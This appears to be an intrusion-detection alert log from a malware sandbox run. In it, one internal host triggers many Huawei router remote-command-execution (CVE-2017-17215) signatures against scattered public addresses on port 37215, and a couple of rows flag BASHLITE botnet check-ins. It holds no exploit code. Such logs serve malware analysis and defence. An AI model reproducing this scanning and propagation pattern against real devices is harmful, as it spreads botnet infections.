                                            06/14/24-10:43:50.111723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552037215192.168.2.14156.5.54.152
                                            06/14/24-10:44:02.366756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355837215192.168.2.14156.182.172.87
                                            06/14/24-10:43:36.703808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194637215192.168.2.14197.155.155.170
                                            06/14/24-10:43:34.661416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018637215192.168.2.14156.36.89.39
                                            06/14/24-10:44:00.322082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602837215192.168.2.14197.240.42.120
                                            06/14/24-10:43:45.987423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3324037215192.168.2.14197.205.242.62
                                            06/14/24-10:44:33.150798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4238437215192.168.2.14156.224.220.39
                                            06/14/24-10:44:10.546368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944437215192.168.2.1441.255.70.92
                                            06/14/24-10:43:56.228110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877637215192.168.2.14156.132.198.98
                                            06/14/24-10:44:18.776040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849637215192.168.2.1441.161.39.241
                                            06/14/24-10:43:36.704765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269237215192.168.2.14156.218.27.154
                                            06/14/24-10:44:06.450142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5393437215192.168.2.1441.86.94.150
                                            06/14/24-10:44:24.914028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744437215192.168.2.14197.93.206.174
                                            06/14/24-10:44:27.001211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361237215192.168.2.14197.235.67.134
                                            06/14/24-10:43:52.164361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265837215192.168.2.14197.106.37.43
                                            06/14/24-10:44:29.013072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786037215192.168.2.1441.83.247.133
                                            06/14/24-10:43:39.788911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4344237215192.168.2.1441.247.137.188
                                            06/14/24-10:44:16.716030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329437215192.168.2.1441.135.3.217
                                            06/14/24-10:43:39.812638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526437215192.168.2.14197.104.47.130
                                            06/14/24-10:44:26.986178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430837215192.168.2.14156.250.141.111
                                            06/14/24-10:44:16.715987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410037215192.168.2.14197.102.158.126
                                            06/14/24-10:44:18.775566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4597837215192.168.2.14197.117.129.16
                                            06/14/24-10:44:18.779005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003437215192.168.2.14156.11.81.99
                                            06/14/24-10:43:39.792061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855837215192.168.2.14156.251.138.132
                                            06/14/24-10:44:33.150886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607237215192.168.2.14197.25.76.212
                                            06/14/24-10:44:00.342565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5992637215192.168.2.14156.106.243.239
                                            06/14/24-10:44:06.472393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5571637215192.168.2.14156.194.181.251
                                            06/14/24-10:43:54.186531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596837215192.168.2.14197.96.252.43
                                            06/14/24-10:44:06.471678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703037215192.168.2.14156.153.50.122
                                            06/14/24-10:44:08.521709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067037215192.168.2.14197.17.187.89
                                            06/14/24-10:44:29.027981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029437215192.168.2.14197.132.207.66
                                            06/14/24-10:44:29.015119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4011837215192.168.2.14197.232.134.85
                                            06/14/24-10:44:18.763758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649437215192.168.2.14197.75.15.161
                                            06/14/24-10:44:20.804073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490637215192.168.2.1441.45.248.192
                                            06/14/24-10:43:54.182577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272437215192.168.2.1441.82.103.165
                                            06/14/24-10:44:10.546973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4914237215192.168.2.14197.255.1.117
                                            06/14/24-10:44:06.472806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311837215192.168.2.14197.237.161.222
                                            06/14/24-10:43:50.072626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563037215192.168.2.14156.238.190.238
                                            06/14/24-10:44:35.182685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395837215192.168.2.14197.75.241.156
                                            06/14/24-10:43:54.200929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971037215192.168.2.14197.49.148.40
                                            06/14/24-10:43:36.704643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438437215192.168.2.14197.107.203.197
                                            06/14/24-10:43:54.183164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213637215192.168.2.14156.6.74.138
                                            06/14/24-10:44:16.735273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099837215192.168.2.1441.175.192.232
                                            06/14/24-10:43:36.700555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5271237215192.168.2.14156.167.152.186
                                            06/14/24-10:44:06.451373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387437215192.168.2.1441.131.103.73
                                            06/14/24-10:44:24.918004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4928237215192.168.2.14156.168.236.11
                                            06/14/24-10:44:18.777292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505637215192.168.2.1441.46.162.84
                                            06/14/24-10:43:45.989889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216837215192.168.2.1441.13.35.30
                                            06/14/24-10:43:48.034827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5337637215192.168.2.1441.73.57.96
                                            06/14/24-10:44:10.549564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400437215192.168.2.14156.214.38.38
                                            06/14/24-10:43:48.019276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4354237215192.168.2.1441.235.46.196
                                            06/14/24-10:43:50.072660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5955037215192.168.2.14197.239.9.94
                                            06/14/24-10:44:31.051920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836237215192.168.2.14197.134.225.29
                                            06/14/24-10:43:48.016364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3371437215192.168.2.1441.238.110.233
                                            06/14/24-10:44:18.761159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766237215192.168.2.14197.55.69.251
                                            06/14/24-10:43:50.073715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3391837215192.168.2.14197.110.137.247
                                            06/14/24-10:43:58.275721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176837215192.168.2.1441.194.23.213
                                            06/14/24-10:43:54.201164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834637215192.168.2.1441.183.40.34
                                            06/14/24-10:44:33.132885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289237215192.168.2.1441.43.228.127
                                            06/14/24-10:43:45.967577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482437215192.168.2.14197.51.165.151
                                            06/14/24-10:43:54.200187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881037215192.168.2.1441.174.175.221
                                            06/14/24-10:44:10.569568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986637215192.168.2.14156.251.153.99
                                            06/14/24-10:44:33.134003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505437215192.168.2.1441.7.38.17
                                            06/14/24-10:44:14.670787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3942037215192.168.2.14156.36.229.133
                                            06/14/24-10:44:08.517513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484637215192.168.2.14197.97.142.62
                                            06/14/24-10:43:54.198962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887837215192.168.2.14197.121.113.0
                                            06/14/24-10:43:58.292847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188437215192.168.2.1441.127.238.145
                                            06/14/24-10:44:04.411350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291037215192.168.2.14197.75.213.211
                                            06/14/24-10:44:14.689585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792037215192.168.2.1441.25.140.23
                                            06/14/24-10:44:02.382493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3895037215192.168.2.14197.84.20.76
                                            06/14/24-10:44:16.715014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111837215192.168.2.1441.250.31.61
                                            06/14/24-10:43:58.290348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524637215192.168.2.14197.125.52.30
                                            06/14/24-10:43:39.791107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492837215192.168.2.14156.135.18.30
                                            06/14/24-10:44:10.562889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484037215192.168.2.14156.78.67.98
                                            06/14/24-10:44:16.733563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140837215192.168.2.14156.167.82.46
                                            06/14/24-10:44:14.668844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083837215192.168.2.14156.122.47.227
                                            06/14/24-10:44:24.917274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043237215192.168.2.1441.15.95.41
                                            06/14/24-10:44:12.617492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929037215192.168.2.14156.196.219.37
                                            06/14/24-10:44:00.325888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5723837215192.168.2.14156.44.189.176
                                            06/14/24-10:43:48.045626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443437215192.168.2.1441.7.198.145
                                            06/14/24-10:44:06.451681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648237215192.168.2.14197.185.88.120
                                            06/14/24-10:43:48.030036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5095637215192.168.2.14156.55.88.160
                                            06/14/24-10:43:43.689188TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)5102423192.168.2.14101.23.0.0
                                            06/14/24-10:44:20.805996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747437215192.168.2.14197.232.159.244
                                            06/14/24-10:44:33.134392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376637215192.168.2.14197.157.108.42
                                            06/14/24-10:44:06.451006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505037215192.168.2.14197.51.200.67
                                            06/14/24-10:44:24.916971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828037215192.168.2.1441.187.216.33
                                            06/14/24-10:43:56.227062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948437215192.168.2.14156.186.174.88
                                            06/14/24-10:43:56.226953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021237215192.168.2.14156.174.80.199
                                            06/14/24-10:44:04.422357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851437215192.168.2.14156.153.157.114
                                            06/14/24-10:44:29.011372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967037215192.168.2.1441.214.219.211
                                            06/14/24-10:43:41.850794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4251837215192.168.2.14197.34.251.4
                                            06/14/24-10:44:04.410567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4672037215192.168.2.14197.125.50.147
                                            06/14/24-10:43:43.968141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835037215192.168.2.14156.13.210.169
                                            06/14/24-10:44:24.915601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057237215192.168.2.14197.190.139.198
                                            06/14/24-10:44:16.733245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213837215192.168.2.14197.47.55.176
                                            06/14/24-10:43:50.115361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049637215192.168.2.14197.168.28.34
                                            06/14/24-10:44:29.014389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900837215192.168.2.14197.77.136.31
                                            06/14/24-10:44:26.978701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192637215192.168.2.14156.217.201.148
                                            06/14/24-10:43:45.966912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5950637215192.168.2.14156.182.101.237
                                            06/14/24-10:44:31.078299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4427837215192.168.2.14197.190.46.241
                                            06/14/24-10:44:14.683847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854037215192.168.2.14156.175.31.166
                                            06/14/24-10:44:14.670170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4462037215192.168.2.14197.5.19.142
                                            06/14/24-10:44:02.383880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3752837215192.168.2.14197.108.114.172
                                            06/14/24-10:44:26.998161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335637215192.168.2.14197.138.29.101
                                            06/14/24-10:43:43.971883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044437215192.168.2.14156.186.136.121
                                            06/14/24-10:44:06.471629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3558237215192.168.2.1441.20.250.143
                                            06/14/24-10:44:31.083970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407637215192.168.2.1441.9.206.170
                                            06/14/24-10:44:12.614483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250437215192.168.2.14156.42.182.194
                                            06/14/24-10:43:34.676782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342437215192.168.2.14156.13.235.110
                                            06/14/24-10:44:16.717324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007237215192.168.2.14197.238.118.203
                                            06/14/24-10:43:36.699504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574837215192.168.2.14156.32.16.165
                                            06/14/24-10:43:56.224955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4326637215192.168.2.14197.25.147.55
                                            06/14/24-10:44:10.704066TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)3872223192.168.2.1443.231.232.101
                                            06/14/24-10:43:56.243620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970837215192.168.2.14156.160.147.29
                                            06/14/24-10:44:16.736392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922437215192.168.2.1441.246.106.8
                                            06/14/24-10:43:36.699956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825637215192.168.2.14156.251.224.110
                                            06/14/24-10:44:10.545076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486237215192.168.2.1441.141.106.145
                                            06/14/24-10:43:52.165011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362437215192.168.2.1441.23.127.171
                                            06/14/24-10:43:41.846024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4225837215192.168.2.1441.117.215.153
                                            06/14/24-10:43:52.161335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599837215192.168.2.14156.5.46.138
                                            06/14/24-10:44:29.023297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434237215192.168.2.14156.57.29.122
                                            06/14/24-10:44:31.051231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4785637215192.168.2.14197.122.67.150
                                            06/14/24-10:44:14.668476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710037215192.168.2.1441.232.121.236
                                            06/14/24-10:44:04.423481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708437215192.168.2.14156.108.69.27
                                            06/14/24-10:43:45.967714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021637215192.168.2.14197.244.141.38
                                            06/14/24-10:44:16.714764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565237215192.168.2.14156.155.214.222
                                            06/14/24-10:44:18.776203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4780437215192.168.2.1441.171.30.157
                                            06/14/24-10:44:29.023501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941837215192.168.2.14197.158.248.111
                                            06/14/24-10:43:52.149900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822637215192.168.2.14156.118.146.81
                                            06/14/24-10:44:04.411427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581637215192.168.2.1441.210.193.53
                                            06/14/24-10:43:48.021930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4231837215192.168.2.14197.167.192.17
                                            06/14/24-10:43:39.790436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174237215192.168.2.14156.199.53.141
                                            06/14/24-10:43:58.293237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606437215192.168.2.14156.67.221.84
                                            06/14/24-10:44:14.672196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090237215192.168.2.14197.185.140.192
                                            06/14/24-10:43:34.678726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755637215192.168.2.14197.152.249.204
                                            06/14/24-10:43:39.792509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542637215192.168.2.14156.86.219.186
                                            06/14/24-10:44:10.543503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917237215192.168.2.14197.110.187.27
                                            06/14/24-10:44:18.763326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778437215192.168.2.14197.119.25.252
                                            06/14/24-10:43:41.848887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904837215192.168.2.1441.154.231.20
                                            06/14/24-10:44:10.547503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493637215192.168.2.14156.190.77.28
                                            06/14/24-10:44:33.133616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530637215192.168.2.1441.186.11.255
                                            06/14/24-10:44:10.543141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177837215192.168.2.1441.242.169.15
                                            06/14/24-10:43:45.991547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4248437215192.168.2.1441.60.19.36
                                            06/14/24-10:44:35.177043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4271437215192.168.2.14156.214.61.240
                                            06/14/24-10:43:36.729521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695037215192.168.2.1441.145.49.163
                                            06/14/24-10:43:52.150862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5571237215192.168.2.1441.253.132.254
                                            06/14/24-10:44:08.505047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998037215192.168.2.14197.199.39.150
                                            06/14/24-10:44:26.980692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287837215192.168.2.1441.188.145.26
                                            06/14/24-10:43:45.969340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607637215192.168.2.1441.147.138.218
                                            06/14/24-10:44:12.617380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5609837215192.168.2.14156.160.59.163
                                            06/14/24-10:43:37.759566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768237215192.168.2.14156.37.109.202
                                            06/14/24-10:44:02.384245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454037215192.168.2.14197.207.131.27
                                            06/14/24-10:43:58.274402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3537037215192.168.2.1441.16.198.179
                                            06/14/24-10:44:08.502596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3357437215192.168.2.14197.144.177.226
                                            06/14/24-10:43:43.968103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4122437215192.168.2.14156.140.1.110
                                            06/14/24-10:44:02.384498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082637215192.168.2.14197.52.107.16
                                            06/14/24-10:43:41.850205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925237215192.168.2.14156.39.27.172
                                            06/14/24-10:44:00.342502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291437215192.168.2.14156.120.216.16
                                            06/14/24-10:44:14.667567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4029037215192.168.2.14197.179.90.96
                                            06/14/24-10:44:27.001245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314637215192.168.2.14197.104.160.232
                                            06/14/24-10:44:10.545999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124637215192.168.2.14197.236.117.128
                                            06/14/24-10:44:24.914737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989237215192.168.2.1441.249.32.223
                                            06/14/24-10:43:39.790265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850637215192.168.2.1441.154.152.237
                                            06/14/24-10:44:08.518910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784437215192.168.2.14156.204.165.167
                                            06/14/24-10:44:24.917528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135637215192.168.2.14156.8.253.78
                                            06/14/24-10:43:48.029009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760437215192.168.2.1441.219.96.117
                                            06/14/24-10:44:10.545445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946437215192.168.2.14156.179.109.221
                                            06/14/24-10:44:18.775502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128837215192.168.2.1441.86.108.143
                                            06/14/24-10:44:24.914374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3754437215192.168.2.14156.100.60.75
                                            06/14/24-10:43:43.943438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582837215192.168.2.14156.13.150.88
                                            06/14/24-10:44:29.025523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825637215192.168.2.14197.5.144.123
                                            06/14/24-10:44:08.502824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340237215192.168.2.14156.230.47.14
                                            06/14/24-10:43:36.725366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507237215192.168.2.1441.242.32.10
                                            06/14/24-10:44:06.451942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767037215192.168.2.1441.225.199.225
                                            06/14/24-10:44:08.519277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677237215192.168.2.14156.16.163.76
                                            06/14/24-10:44:29.024623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603037215192.168.2.14197.229.76.227
                                            06/14/24-10:44:27.000023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315437215192.168.2.1441.91.26.113
                                            06/14/24-10:44:22.881036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125437215192.168.2.14156.156.192.116
                                            06/14/24-10:43:34.661574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810437215192.168.2.1441.198.161.145
                                            06/14/24-10:44:08.520113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211637215192.168.2.14156.39.175.48
                                            06/14/24-10:44:14.672446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848037215192.168.2.14197.104.237.231
                                            06/14/24-10:44:29.010803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068637215192.168.2.1441.238.148.17
                                            06/14/24-10:43:48.028630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565037215192.168.2.1441.38.251.129
                                            06/14/24-10:43:41.849546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920437215192.168.2.14197.60.87.19
                                            06/14/24-10:44:00.325791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190437215192.168.2.14156.83.52.56
                                            06/14/24-10:43:54.200093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187437215192.168.2.14156.175.182.5
                                            06/14/24-10:43:56.230410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827837215192.168.2.14197.10.213.231
